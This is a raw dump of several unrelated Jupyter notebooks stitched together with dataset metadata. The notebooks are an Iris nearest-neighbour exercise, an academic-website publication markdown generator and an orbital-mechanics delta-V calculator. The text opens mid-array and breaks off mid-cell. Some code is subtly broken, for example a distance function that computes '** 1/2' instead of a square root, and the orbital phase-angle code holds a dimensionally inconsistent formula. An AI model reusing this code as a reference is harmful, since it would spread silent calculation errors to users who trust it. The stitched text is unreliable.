5.1 2. ]\n [6.4 2.7 5.3 1.9]\n [6.8 3. 5.5 2.1]\n [5.7 2.5 5. 2. ]\n [5.8 2.8 5.1 2.4]\n [6.4 3.2 5.3 2.3]\n [6.5 3. 5.5 1.8]\n [7.7 3.8 6.7 2.2]\n [7.7 2.6 6.9 2.3]\n [6. 2.2 5. 1.5]\n [6.9 3.2 5.7 2.3]\n [5.6 2.8 4.9 2. ]\n [7.7 2.8 6.7 2. ]\n [6.3 2.7 4.9 1.8]\n [6.7 3.3 5.7 2.1]\n [7.2 3.2 6. 1.8]\n [6.2 2.8 4.8 1.8]\n [6.1 3. 4.9 1.8]\n [6.4 2.8 5.6 2.1]\n [7.2 3. 5.8 1.6]\n [7.4 2.8 6.1 1.9]\n [7.9 3.8 6.4 2. ]\n [6.4 2.8 5.6 2.2]\n [6.3 2.8 5.1 1.5]\n [6.1 2.6 5.6 1.4]\n [7.7 3. 6.1 2.3]\n [6.3 3.4 5.6 2.4]\n [6.4 3.1 5.5 1.8]\n [6. 3. 4.8 1.8]\n [6.9 3.1 5.4 2.1]\n [6.7 3.1 5.6 2.4]\n [6.9 3.1 5.1 2.3]\n [5.8 2.7 5.1 1.9]\n [6.8 3.2 5.9 2.3]\n [6.7 3.3 5.7 2.5]\n [6.7 3. 5.2 2.3]\n [6.3 2.5 5. 1.9]\n [6.5 3. 5.2 2. ]\n [6.2 3.4 5.4 2.3]\n [5.9 3. 5.1 1.8]]\n"
],
[
"# euclidean distance of 2 observations\np1 = data[50]\np2 = data[100]\nsum(((p1 - p2)**2))**(1/2)",
"_____no_output_____"
],
[
"# initialize distance matrix. What will be its final shape?\ndist = []",
"_____no_output_____"
],
[
"# Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula\n\n# Iterates throw the number of lines in data\nfor i in range(data.shape[0]):\n \n dist_row = []\n \n # Iterates throw the number of lines in data\n for j in range(data.shape[0]):\n \n single_dist = sum((data[i] - data[j]) ** 2) ** (1/2)\n # Append the results to dist_row\n dist_row.append(single_dist)\n \n # At the end of the second loop, append list to matrix dist\n dist.append(dist_row) ",
"_____no_output_____"
],
[
"dist",
"_____no_output_____"
],
[
"# another import (usually all imports are done at the top of the script/ notebook)\n# Open-source Python library built on top of matplotlib. It is used for data visualization and exploratory data analysis. \n # Seaborn works easily with dataframes and the Pandas library.\nimport seaborn as sns",
"_____no_output_____"
],
[
"sns.heatmap(dist)",
"_____no_output_____"
]
],
[
[
"# Plotting data: \nDon't worry about the code as that's not the objective of the exercise and we will learn how to plot data in future classes\n### How can we represent an observation in a N-dimensional Space",
"_____no_output_____"
]
],
[
[
"# plotting library available for the Python programming language as a component of NumPy, \n #a big data numerical handling resource. Matplotlib uses an object oriented API to embed plots in Python applications\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"# 2D scatter plot\nplt.scatter(data[:, 0], data[:, 1])\n\n# Eixo x: sepal length\nplt.xlabel(dataset[\"feature_names\"][0])\n# Eixo y: sepal width\nplt.ylabel(dataset[\"feature_names\"][1])\n# Show plot\nplt.show()",
"_____no_output_____"
],
[
"# 1D scatter plot\nplt.scatter(data[:, 0], [0 for i in range(data.shape[0])])\n\n# Eixo x: sepal length\nplt.xlabel(dataset[\"feature_names\"][0])\n\nplt.show()",
"_____no_output_____"
],
[
"# 3D scatter plot\n\n\nfig = plt.figure(figsize=(14, 7)) # defining a figure so we can add a 3d subplot\n# figsize=Width, height in inches\n\n# Used to add an Axes to the figure as part of a subplot arrangement\nax = fig.add_subplot(111, projection=\"3d\")\n\n\n# 3 columns = 3 dimensions\nax.scatter(data[:, 0], data[:, 1], data[:, 2])\n\n# Labelling the axes\nax.set_xlabel(dataset[\"feature_names\"][0])\nax.set_ylabel(dataset[\"feature_names\"][1])\nax.set_zlabel(dataset[\"feature_names\"][2])\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Finding nearest neighbors",
"_____no_output_____"
]
],
[
[
"# Let's start off simple. If we want to find the minimum value we use the following code:\n\nmin_args, min_dist = (None, 9e99) # initialize these variables outside the loop so their scope is defined globally and we can update and track their values at each iteration.\n\nfor id_r, row in enumerate(dist): # enumerate to not only iterate along the rows of dist but also to keep track of the row index we are at: id_r\n dist_ = min(row) # minimum distance in the current row\n \n if dist_ <= min_dist:\n min_dist = dist_ # if the minimum distance of the row is <= the minimum global distance, then we update the later\n min_args = id_r # and we also are able to know at which row index we found the minimum global distance!",
"_____no_output_____"
],
[
"# Next step. Let's try to additionally find the column index responsible for the minimum global distance. \n# Then, together with the row index we can know which observations are closest together (i.e. have the smallest distance):\n\nmin_args, min_dist = (None, 9e99)\n\nfor id_r, row in enumerate(dist):\n \n dist_ = min(row)\n \n if dist_ <= min_dist:\n min_dist = dist_\n \n for id_c, dist_val in enumerate(row):\n \n if dist_val == dist_: # to find the column index responsible for the current minimum global distance we need to iterate along the current row distances and if at a given iteration we find that the corresponding distance is the same as the current minimum global distance, then we know that we the tracked column index id_c is the one responsible for the current minimum global distance\n min_args = (id_r, id_c)\n break # after finding the column index responsible for the current minimum global distance, we exit the loop as we don't need to search any longer",
"_____no_output_____"
],
[
"# The way we search for the minimum distance and the corresponding observations is explained. However we have to take care\n# of a very important detail. Since the distance matrix is a symmetric and 0-diagonal matrix (distance of the observation\n# with itself is 0) we should only perform the search over either the upper or lower traingle of the matrix. \n# Let's implement this:\n\nmin_args, min_dist = (None, 9e99)\n\nfor id_r, row in enumerate(dist):\n \n row_relevant = row.copy()[:id_r] # we define row_relevant as a copy of row that only holds a slice of the values corresponding to the distances in the lower diagonal of the matrix (i.e. excludes value in row corresponding to diagonal and upper triangle as it holds redundant information). We will only look for the minimum distance and the corresponding observations in these values\n dist_ = min(row_relevant) if len(row_relevant)>0 else 9e99 # the if condition ensures we do not call the min() function on an empty list (happens at first iteration when id_r = 0)\n \n if dist_<=min_dist:\n min_dist = dist_\n \n for id_c, dist_val in enumerate(row_relevant):\n if dist_val == dist_:\n min_args = (id_r, id_c)\n break\n\n",
"_____no_output_____"
],
[
"min_dist",
"_____no_output_____"
],
[
"min_args",
"_____no_output_____"
],
[
"print(data[min_args[0]])\nprint(data[min_args[1]])\nprint('minimum distance:\\t', min_dist)",
"[5.8 2.7 5.1 1.9]\n[5.8 2.7 5.1 1.9]\nminimum distance:\t 0.0\n"
]
],
[
[
"## Define functions\nWhy do we want to define functions in this case?",
"_____no_output_____"
]
],
[
[
"def distance_matrix(data):\n dist = []\n # Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula\n for i in range(data.shape[0]):\n dist_row = []\n for j in range(data.shape[0]):\n single_dist = sum((data[i] - data[j]) ** 2) ** 1/2\n dist_row.append(single_dist)\n dist.append(dist_row) \n return dist \n\ndef closest_points(dist_matrix):\n # get variables to save closest neighbors later\n min_args, min_dist = (None, 9e99)\n for id_r, row in enumerate(dist_matrix):\n row_ = row.copy()[:id_r]\n dist = min(row_) if len(row_)>0 else 9e99\n # check if the row's min distance is the lowest distance found so far\n if dist<=min_dist:\n # save points' ids and their distance\n min_dist = dist \n for id_diag, dist_val in enumerate(row_):\n if dist_val==dist:\n min_args = (id_diag, id_r)\n break\n return min_args, min_dist\n",
"_____no_output_____"
]
],
[
[
"## Finding the `n` shortest distances",
"_____no_output_____"
]
],
[
[
"dist_matrix = distance_matrix(data)\nn_distances = 10\n\ndistances = []\n\nfor _ in range(n_distances):\n \n # return min_args, min_dist\n c_points = closest_points(dist_matrix)\n \n # append to list distances\n distances.append(c_points)\n \n # Increasing shortest distance value to find the next shortest distance\n dist_matrix[c_points[0][1]][c_points[0][0]] = 9e99 \n\ndistances",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53ad65ad7b0a874860d83fe2a42077adbd677e | 14,369 | ipynb | Jupyter Notebook | markdown_generator/.ipynb_checkpoints/publications-checkpoint.ipynb | pbrimble/pbrimble.github.io | f84827d3fd33d8ce95ec6ff99443ae56a03a2b2a | [
"MIT"
] | null | null | null | markdown_generator/.ipynb_checkpoints/publications-checkpoint.ipynb | pbrimble/pbrimble.github.io | f84827d3fd33d8ce95ec6ff99443ae56a03a2b2a | [
"MIT"
] | null | null | null | markdown_generator/.ipynb_checkpoints/publications-checkpoint.ipynb | pbrimble/pbrimble.github.io | f84827d3fd33d8ce95ec6ff99443ae56a03a2b2a | [
"MIT"
] | null | null | null | 37.129199 | 448 | 0.522444 | [
[
[
"# Publications markdown generator for academicpages\n\nTakes a TSV of publications with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)). The core python code is also in `publications.py`. Run either from the `markdown_generator` folder after replacing `publications.tsv` with one containing your data.\n\nTODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style.\n",
"_____no_output_____"
],
[
"## Data format\n\nThe TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, site_url, and paper_url, with a header at the top. \n\n- `excerpt` and `paper_url` can be blank, but the others must have values. \n- `pub_date` must be formatted as YYYY-MM-DD.\n- `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/publications/YYYY-MM-DD-[url_slug]`\n\nThis is how the raw file looks (it doesn't look pretty, use a spreadsheet or other program to edit and create).",
"_____no_output_____"
]
],
[
[
"!cat publications.tsv",
"pub_date\ttitle\tvenue\texcerpt\tcitation\turl_slug\tpaper_url\r\r\n01/10/2009\tPaper Title Number 1\tJournal 1\tThis paper is about the number 1. The number 2 is left for future work.\t\"<b>Your Name, You.</b> 2009. \"\"Paper Title Number 1.\"\" <i>Journal 1</i>. 1(1).\"\tpaper-title-number-1\thttp://academicpages.github.io/files/paper1.pdf\r\r\n01/10/2010\tPaper Title Number 2\tJournal 1\tThis paper is about the number 2. The number 3 is left for future work.\t\"<b>Your Name, You.</b> 2010. \"\"Paper Title Number 2.\"\" <i>Journal 1</i>. 1(2).\"\tpaper-title-number-2\thttp://academicpages.github.io/files/paper2.pdf\r\r\n01/10/2015\tPaper Title Number 3\tJournal 1\tThis paper is about the number 3. The number 4 is left for future work.\t\"<b>Your Name, You.</b> 2015. \"\"Paper Title Number 3.\"\" <i>Journal 1</i>. 1(3).\"\tpaper-title-number-3\thttp://academicpages.github.io/files/paper3.pdf\r\r\n02/10/2015\tPaper Title Number 4\tJournal 1\tThis paper is about the number 4. The number 4 is left for future work.\t\"<b>Your Name, You.</b> 2015. \"\"Paper Title Number 4.\"\" <i>Journal 1</i>. 1(4).\"\tpaper-title-number-4\thttp://academicpages.github.io/files/paper4.pdf "
]
],
[
[
"## Import pandas\n\nWe are using the very handy pandas library for dataframes.",
"_____no_output_____"
]
],
[
[
"import pandas as pd",
"_____no_output_____"
]
],
[
[
"## Import TSV\n\nPandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\\t`.\n\nI found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others.",
"_____no_output_____"
]
],
[
[
"publications = pd.read_csv(\"publications.tsv\", sep=\"\\t\", header=0)\npublications\n",
"_____no_output_____"
]
],
[
[
"## Escape special characters\n\nYAML is very picky about how it takes a valid string, so we are replacing single and double quotes (and ampersands) with their HTML encoded equivilents. This makes them look not so readable in raw format, but they are parsed and rendered nicely.",
"_____no_output_____"
]
],
[
[
"html_escape_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\"\n }\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c,c) for c in text)",
"_____no_output_____"
]
],
[
[
"## Creating the markdown files\n\nThis is where the heavy lifting is done. This loops through all the rows in the TSV dataframe, then starts to concatentate a big string (```md```) that contains the markdown for each type. It does the YAML metadata first, then does the description for the individual page.",
"_____no_output_____"
]
],
[
[
"import os\nfor row, item in publications.iterrows():\n \n md_filename = str(item.pub_date) + \"-\" + item.url_slug + \".md\"\n html_filename = str(item.pub_date) + \"-\" + item.url_slug\n year = item.pub_date[:4]\n \n ## YAML variables\n \n md = \"---\\ntitle: \\\"\" + item.title + '\"\\n'\n \n md += \"\"\"collection: publications\"\"\"\n \n md += \"\"\"\\npermalink: /publication/\"\"\" + html_filename\n \n if len(str(item.excerpt)) > 5:\n md += \"\\nexcerpt: '\" + html_escape(item.excerpt) + \"'\"\n \n md += \"\\ndate: \" + str(item.pub_date) \n \n md += \"\\nvenue: '\" + html_escape(item.venue) + \"'\"\n \n if len(str(item.paper_url)) > 5:\n md += \"\\npaperurl: '\" + item.paper_url + \"'\"\n \n md += \"\\ncitation: '\" + html_escape(item.citation) + \"'\"\n \n md += \"\\n---\"\n \n ## Markdown description for individual page\n \n if len(str(item.excerpt)) > 5:\n md += \"\\n\" + html_escape(item.excerpt) + \"\\n\"\n \n if len(str(item.paper_url)) > 5:\n md += \"\\n[Download paper here](\" + item.paper_url + \")\\n\" \n \n md += item.citation\n \n md_filename = os.path.basename(md_filename)\n \n with open(\"../_publications/\" + md_filename, 'w') as f:\n f.write(md)",
"_____no_output_____"
]
],
[
[
"These files are in the publications directory, one directory below where we're working from.",
"_____no_output_____"
]
],
[
[
"!ls ../_publications/",
"\u001b[31m2009-10-01-paper-title-number-1.md\u001b[m\u001b[m \u001b[31m2015-10-01-paper-title-number-3.md\u001b[m\u001b[m\r\n2009-paper-title-number-1.md 2015-paper-title-number-3.md\r\n\u001b[31m2010-10-01-paper-title-number-2.md\u001b[m\u001b[m 2015-paper-title-number-4.md\r\n2010-paper-title-number-2.md \u001b[31m2020-02-18-kigali-property-valuation.md\u001b[m\u001b[m\r\n"
],
[
"!cat ../_publications/2009-10-01-paper-title-number-1.md",
"---\r\ntitle: \"Paper Title Number 1\"\r\ncollection: publications\r\npermalink: /publication/2009-10-01-paper-title-number-1\r\nexcerpt: 'This paper is about the number 1. The number 2 is left for future work.'\r\ndate: 2009-10-01\r\nvenue: 'Journal 1'\r\npaperurl: 'http://academicpages.github.io/files/paper1.pdf'\r\ncitation: 'Your Name, You. (2009). "Paper Title Number 1." <i>Journal 1</i>. 1(1).'\r\n---\r\nThis paper is about the number 1. The number 2 is left for future work.\r\n\r\n[Download paper here](http://academicpages.github.io/files/paper1.pdf)\r\n\r\nRecommended citation: Your Name, You. (2009). \"Paper Title Number 1.\" <i>Journal 1</i>. 1(1)."
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb53b4f3ce1846b8abeb0ffb17717379c6b26319 | 84,219 | ipynb | Jupyter Notebook | orb_mech (2).ipynb | cjessop/yessir | d58dd172f03628a14f5e1c89e021e0c4498054c3 | [
"MIT"
] | null | null | null | orb_mech (2).ipynb | cjessop/yessir | d58dd172f03628a14f5e1c89e021e0c4498054c3 | [
"MIT"
] | null | null | null | orb_mech (2).ipynb | cjessop/yessir | d58dd172f03628a14f5e1c89e021e0c4498054c3 | [
"MIT"
] | null | null | null | 85.850153 | 25,848 | 0.791365 | [
[
[
"#!pip install jupyterthemes\n#!jt -t chesterish\n#!pip install autopep8",
"_____no_output_____"
],
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport tkinter as tk",
"_____no_output_____"
],
[
"class Planet():\n def __init__(self, a, M, e, T, r, n, soi):\n self.G = 6.67e-11\n self.semimajor_axis = a\n self.mass = M\n self.eccentricity = e\n self.period = T\n self.radius = r\n self.mu = self.mass * self.G\n self.name = n\n self.soi = soi",
"_____no_output_____"
],
[
"def format_response_dv(dV):\n string_fin = str(dV) + ' ' + 'm/s'\n \n return string_fin \n",
"_____no_output_____"
],
[
"#Earth = Planet(a = 149598023e3, M = 5.927e24, e = 0.0167086, T = 31558149.504, mu = 3.986e14)\n#print('The semi-major axis of Earth is ' + str(Earth.semimajor_axis / 1000) + ' km')\n#print('mu Earth is ' + str(Earth.mu) + ' m^3/s^2')\n\n# All values give in MKS, as it should be, except semi-major axis and soi which is in km\n\n\nMercury = Planet(a = 5.790934e7, M = 3.301e23, e = 0.206, T = 7600176, r = 4879000 / 2, n = 'Mercury', soi = 0.117e6)\nVenus = Planet(a = 1.082041e8, M = 4.867e24, e = 0.007, T = 19394640, r = 12104000 / 2, n = 'Venus', soi = 0.616e6)\nEarth = Planet(a = 1.496e8, M = 5.972e24, e = 0.017, T= 31558149.504, r = 12756000 / 2, n = 'Earth', soi = 0.929e6)\nMars = Planet(a = 2.27987e8, M = 6.417e23, e = 0.093, T = 5.9288e7, r = 6792000 / 2, n = 'Mars', soi = 0.578e6)\nJupiter = Planet(a = 7.783577e8, M = 1.899e27, e = 0.048, T = 3.7528e8, r = 142984000 / 2, n = 'Jupiter', soi = 48.2e6)\nSaturn = Planet(a = 1.4331e9, M = 5.685e26, e = 0.056, T = 9.3031e8, r = 120536000 / 2, n = 'Saturn', soi = 54.5e6)\nUranus = Planet(a = 2.8723e9, M = 8.682e25, e = 0.046, T = 2.649e9, r = 51118000 / 2, n = 'Uranus', soi = 51.9e6)\nNeptune = Planet(a = 4.496912e9, M = 1.024e26, e = 0.010, T = 5.19713e9, r = 49528000 / 2, n = 'Neptune', soi = 86.2e6)\nKerbin = Planet(a = 13599840256, M = 5.2915e22, e = 0, T = 9203545, r = 2370000 / 2, n = 'Kerbin', soi = 0)\n",
"_____no_output_____"
],
[
"type(Earth)\nprint(Earth.mu)",
"398332400000000.0\n"
],
[
"def deltaV_1(r1,r2, Planet):\n \"\"\"Takes two positional arguments and returns a value for the delta-V for a supplied planet\"\"\"\n mu = Planet.mu\n #print(mu_Earth)\n A = np.sqrt(mu / r1)\n #print(A)\n B = (np.sqrt((2 * r2) / (r1 + r2)) - 1)\n #print(B)\n dV1 = A*B\n placehold = dV1\n label['text'] = format_response_dv(placehold)\n return dV1",
"_____no_output_____"
],
[
"def deltaV_2(r1,r2, Planet):\n\t\"\"\"Takes two positional arguments and returns a value for the delta-V for a supplied planet\"\"\"\n\tmu = Planet.mu\n\tA = np.sqrt(mu / r2)\n\tB = (1 - np.sqrt((2 * r1) / (r1 + r2)))\n\tdV2 = A*B\n\treturn dV2",
"_____no_output_____"
],
[
"#The angle has to be converted to radians\ndef NormRad(v_i, theta):\n \"\"\"Calculates the required delta-V for a normal/radial burn\"\"\"\n #A = (v_i ** 2) + (v_f ** 2) \n #B = - ((2 * v_i * v_f) * np.cos(theta))\n #dV = np.sqrt(A * B)\n #dV = np.sqrt((v_i ** 2 + v_f ** 2))\n theta_over_two = np.radians(theta) / 2 \n dV = (2 * v_i) * (np.sin(theta_over_two))\n placehold = dV\n label['text'] = format_response_dv(placehold)\n return np.round(dV)",
"_____no_output_____"
],
[
"def NormRad_TwoVel(v_i, v_f, theta):\n \"\"\"Has the same use as the NormRad function, takes an additional argument for the instance where the final\n velocity is different to the initial\"\"\"\n #A = (v_i ** 2) + (v_f ** 2) \n theta_rad = np.radians(theta)\n #B = - ((2 * v_i * v_f) * np.cos(theta_rad))\n dV = np.sqrt((v_i**2 + v_f**2) - (2 * v_i * v_f * np.cos(theta_rad)))\n placehold = dV\n label['text'] = format_response_dv(placehold)\n return dV",
"_____no_output_____"
],
[
"#print(NormRad_TwoVel(7500, 7500, 8))",
"_____no_output_____"
],
[
"def NormRadPlot(v):\n velocity = v\n theta = np.linspace(0,360,1000)\n theta_over_two = np.radians(theta) / 2 \n delta_V_normRad = (2 * velocity) * (np.sin(theta_over_two))\n plt.plot(theta, delta_V_normRad)\n plt.title('Delta V requirements for a Normal/Radial maneuver')\n plt.ylabel('Delta V')\n plt.xlabel('Angle (Degrees)')\n plt.grid(True)\n plt.show()",
"_____no_output_____"
],
[
"NormRadPlot(7000)",
"_____no_output_____"
],
[
"\n \ndef NormRadPlot_TwoVel(v_i, v_f):\n v_initial = v_i\n v_final = v_f\n theta = np.linspace(0,360,1000)\n theta_rad = np.radians(theta) \n dV_TwoVel = np.sqrt((v_initial**2 + v_final**2) - (2 * v_initial * v_final * np.cos(theta_rad)))\n plt.plot(theta, dV_TwoVel)\n plt.title('Delta V requirements for a Normal/Radial maneuver (with a different final velocity)')\n plt.ylabel('Delta V')\n plt.xlabel('Angle (Degrees)')\n plt.grid(True)\n plt.show()",
"_____no_output_____"
],
[
"NormRadPlot_TwoVel(7000, 20000)",
"_____no_output_____"
],
[
"def Orbital_Velocity(r, Planet):\n \"\"\"Calculates the orbital veloctiy around a given planet using a supplied radius in metres\"\"\"\n mu = Planet.mu\n radius = Planet.radius + r\n v = np.sqrt(mu / radius)\n return v\n\ndef Orbital_Period(r, Planet):\n \"\"\"Calculates the orbital period around a given planet using the supplied radius in metres\"\"\"\n mu = Planet.mu\n radius = Planet.radius + r\n period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds\n return period\n",
"_____no_output_____"
],
[
"#Intend to add if statement to break the function if the escape velocity is reached\n\ndef Orbital_Velocity_Plot(Planet):\n mu = Planet.mu\n radius = Planet.radius + np.linspace(1,10000000,10000)\n v = np.sqrt(mu / radius)\n plt.plot(v, radius)\n plt.ylabel('radius (m)')\n plt.xlabel('velocity (m/s)')\n plt.title('Orbital velocity for a given body')\n plt.grid(True)\n \ndef Orbital_Period_Plot(Planet):\n mu = Planet.mu\n radius = Planet.radius + np.linspace(10000,10000000,10000)\n period = np.sqrt((4 * np.pi**2 * radius**3) / (mu)) #seconds\n plt.plot(period, radius)\n plt.ylabel('radius (m)')\n plt.xlabel('period (s)')\n plt.title('Orbital period for a given body')\n plt.grid(True)",
"_____no_output_____"
],
[
"# angle_test = np.linspace(1,90,90)\n# print(angle_test)\n\n# for i in angle_test:\n# \tvel = 2000\n# \td_v = np.sqrt((2 * (vel ** 2)) * (1 - np.cos(i)))\n# \tmatplotlib.pyplot.plot(angle_test, d_v)\n\n\n# print(Jupiter.mass)\n# print(deltaV_1(700000, 900000, Mars))\n# print(deltaV_2(700000,900000, Mars))\n\ndef Planet_info(Planet):\n print('The semi-major axis is ' + str(Planet.semimajor_axis / 1000) + ' km or ' + str(Planet.semimajor_axis / 1.496e11) + ' AU')\n print('mu is ' + str(Planet.mu) + ' m^3/s^2')\n print('The Mass is ' + str(Planet.mass) + ' kg')\n print('The eccentricity is ' + str(Planet.eccentricity) + ' [Dimensionless]')\n print('The orbital period is ' + str(Planet.period) + ' s or ' + str(Planet.period / (60 *60 * 24 * 365)) + ' years')",
"_____no_output_____"
]
],
[
[
"## Phase Angle and Delta-V calculator",
"_____no_output_____"
],
[
"### Phase Angle\n$t_{h} = \\pi \\sqrt{\\frac{(r_1 + r_2)^3}{8\\mu}}$ $\\rightarrow$ $\\mu$ is the the solar value in these cases $\\\\$\n$\\theta_{phase} = 180^{\\circ} - \\sqrt{\\frac{\\mu}{r_1}}\\frac{t_h}{r_2}\\frac{180}{\\pi}$\n\n### Velocity\n$\\Delta v_1 = \\sqrt{\\frac{\\mu}{r_1}}(\\sqrt{\\frac{2 r_2}{r_1 + r_2}}-1)$ $\\\\$\n$v_1 = \\sqrt{\\frac{r_1(r_2 \\cdot r_2^{2} - 2 \\mu) + r_2 \\cdot \\mu}{r_1 \\cdot r_2}}$ $\\rightarrow$ $\\mu$ here is the planetary value. Additionally, $v_2$ is the SOI exit velocity, which should be the same as the value of $\\Delta v_1$. $r_2$ is the SOI radius whilst $r_1$ is the radius of the parking orbit.\n\n### Transfer Burn Point\n$\\epsilon = \\frac{v^2}{2} - \\frac{\\mu}{r}$ $\\rightarrow$ $\\mu$ again is for the origin planet\n\n\n$\\textbf{h} = \\textbf{r} \\times \\textbf{v}$ \n\n\n$e = \\sqrt{1 + \\frac{2 \\epsilon h^2}{\\mu^2}}$\n\n$\\theta = cos^{-1}(\\frac{1}{e})$ $\\rightarrow$ make sure this value is in degrees not radians\n\n$\\therefore$ Ejection Angle $= 180^{\\circ} - \\theta$ \n\nNB Positive values indicate the target planet starts out in\nfront. Negative values mean the target planet starts behind for the first section\n",
"_____no_output_____"
],
[
"GM_sun = 1.32712440018e11\n#a = (149e6 + 227e6) / 2\nprint(Earth.semimajor_axis)\na = ((Earth.semimajor_axis) + (Mars.semimajor_axis)) / 2\nprint(a)\np = np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)\n#t_h = np.pi * np.sqrt(((149597887000 + 227000000000)**3) / 8 * GM_sun)\nprint((str((p / (60 * 60 * 24 * 30)) / 2)) + ' months')",
"_____no_output_____"
]
],
[
[
"def Phase_Angle(Planet1, Planet2):\n \"\"\"Calculates the phase angle (in degrees), this is the angle from one planet to another with the sun at\nthe vertex and is essential for timing interplanetary missions\"\"\"\n GM_sun = 1.327e11\n #print(Planet1.semimajor_axis)\n #t_h = np.pi * np.sqrt(((Planet1.semimajor_axis + Planet2.semimajor_axis)**3) / 8 * GM_sun)\n a = ((Planet1.semimajor_axis) + (Planet2.semimajor_axis)) / 2\n t_h = (np.sqrt((4 * (3.142 ** 2) * (a ** 3)) / GM_sun)) / 2\n #print(t_h)\n print(\"The Hohmann transfer time from \" + str(Planet1.name) + \" to \" + str(Planet2.name) + \" is \" \n + str(np.round((t_h / (60 * 60 * 24 * 30)), decimals=2)) + \" months, or \" \n + str(np.round((t_h / (60 * 60 * 24)), decimals=0)) + \" days\")\n \n phase_angle = (180 - np.sqrt(GM_sun / Planet2.semimajor_axis)) * (t_h / Planet2.semimajor_axis) * (180/np.pi)\n \n deg_per_day = 360 / (Planet2.period / (60 * 60 * 24))\n print(str(np.round(deg_per_day, decimals=2)) + \" degrees per day\") \n phase_angle2 = 180 - (deg_per_day * (t_h / (60 * 60 * 24)))\n \n \n return phase_angle2\n #return phase_angle",
"_____no_output_____"
],
[
"def Delta_v_transfer(Planet1, Planet2): #This is v2\n GM_sun = 1.327e11\n delta_v_transfer = np.sqrt(GM_sun / Planet1.semimajor_axis) \\\n * ((np.sqrt((2 * Planet2.semimajor_axis) / (Planet1.semimajor_axis + Planet2.semimajor_axis))) - 1)\n return delta_v_transfer",
"_____no_output_____"
],
[
"def Ejection_Velocity(Planet1, Planet2, r): #This uses v2 to get v\n r = (r * 1000) + Planet1.radius #Parking orbit radius (planetary radius + orbital altitude)\n excess_v = Delta_v_transfer(Planet1, Planet2) * 1000 #Convert to meters for next calculation\n #print(str(excess_v) + ' is the excess velocity')\n eject_v = np.sqrt((r * (Planet1.soi * ((excess_v) ** 2)) - (2 * Planet1.mu) + (2 * Planet1.soi * Planet1.mu)) \\\n / (r * Planet1.soi))\n #print(eject_v)\n return eject_v / 1000 #Convert back to km",
"_____no_output_____"
],
[
"def Delta_v(Planet1, Planet2, r):\n \"\"\"Input origin body/planet, destination body/planet and the altitude of your parking orbit\n in kilometers and return a value for your delta-V requirements\"\"\"\n v = Ejection_Velocity(Planet1, Planet2, r)\n #print(v)\n #dv1 = Delta_v_transfer(Planet1, Planet2)\n #print(dv1)\n radius = (r * 1000) + Planet1.radius #Take orbital radius given in km and convert to meters for calculation\n v0 = np.sqrt((Planet1.mu) / radius) / 1000 #Convert to km/s\n #print(v0)\n delta_v = v - v0\n print(str(np.round(delta_v, decimals = 2)) + \\\n \" km/s <- This value is the actual delta V required to get from \" + str(Planet1.name) + \" to \" + str(Planet2.name) + \" from a parking orbit of \" + str(r) + \" km\")\n return delta_v",
"_____no_output_____"
],
[
"Delta_v(Earth, Mars, 100)",
"3.63 km/s <- This value is the actual delta V required to get from Earth to Mars from a parking orbit of 100 km\n"
],
[
"Delta_v.__doc__",
"_____no_output_____"
],
[
"def Ejection_Angle(Planet1, Planet2, r):\n v = Ejection_Velocity(Planet1, Planet2, r) * 1000 #Convert to meters\n radius = (r * 1000) + Planet1.radius\n eta = ((v **2) / 2) * (Planet1.mu / radius)\n h = r * v\n e = np.sqrt(1 + ((2 * eta * (h ** 2)) / (Planet1.mu ** 2)))\n theta = np.arccos(1 / e)\n return 'The ejection angle required is ' + str(np.round(180 - np.degrees(theta))) + ' degrees'",
"_____no_output_____"
],
[
"Ejection_Angle(Earth, Mars, 100)",
"_____no_output_____"
]
],
[
[
"##### \nwhile True:\n\tprint('1. Calculate delta V for a Hohmann transfer')\n\tprint('2. Calculate detlta V for a normal or radial burn (Constant velocity)')\n\tprint('3. Calculate detlta V for a normal or radial burn (different final velocity)')\n\tprint('4. Display planetary data')\n\tprint('5. Create custom planet')\n\tprint('6. Exit programme')\n\tchoice = int(input('Select what you would like to do '))\n\tif (choice == 1):\n\t\tprint('1. Mercury')\n\t\tprint('2. Venus')\n\t\tprint('3. Earth')\n\t\tprint('4. Mars')\n\t\tprint('5. Jupiter')\n\t\tprint('6. Saturn')\n\t\tprint('7. Uranus')\n\t\tprint('8. Neptune')\n\t\tplanet = int(input(print('Which planet are you maneuvering around?')))\n\n\t\tif (planet == 1):\n\t\t\tprint('Please enter your r1 and r2 for Mercury in metres for the first burn')\n\t\t\tr1_Mercury = int(input('r1 = '))\n\t\t\tr2_Mercury = int(input('r2 = '))\n\t\t\tprint(str(deltaV_1(r1_Mercury, r2_Mercury, Mercury)) + ' 